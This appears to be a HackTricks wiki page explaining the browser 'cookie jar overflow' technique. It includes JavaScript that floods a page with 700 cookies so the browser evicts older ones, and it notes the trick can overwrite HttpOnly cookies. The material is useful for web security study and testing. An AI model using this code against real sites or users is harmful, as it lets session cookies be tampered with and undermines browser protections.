Cookie jar overflow

[AD REMOVED]

The browsers have a limit on the number of cookies that they can store for a page. Then, if for some reason you need to make a cookie disappear, you can overflow the cookie jar as the oldest ones will be deleted before:

// Set many cookies
for (let i = 0; i < 700; i++) {
  document.cookie = `cookie${i}=${i}; Secure`
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
  document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}

Notice, that third party cookies pointing to a different domain won't be overwritten.

[!CAUTION] This attack can also be used to overwrite HttpOnly cookies as you can delete it and then reset it with the value you want.

Check this in this post with a lab.

[AD REMOVED]

All content on this page is from HackTricks, which belongs to Carlos Polop and is licensed under the Creative Commons Attribution-NonCommercial 4.0 International (CC BY-NC 4.0) license unless otherwise specified. This page is generated from the HackTricks wiki and just has the ads removed.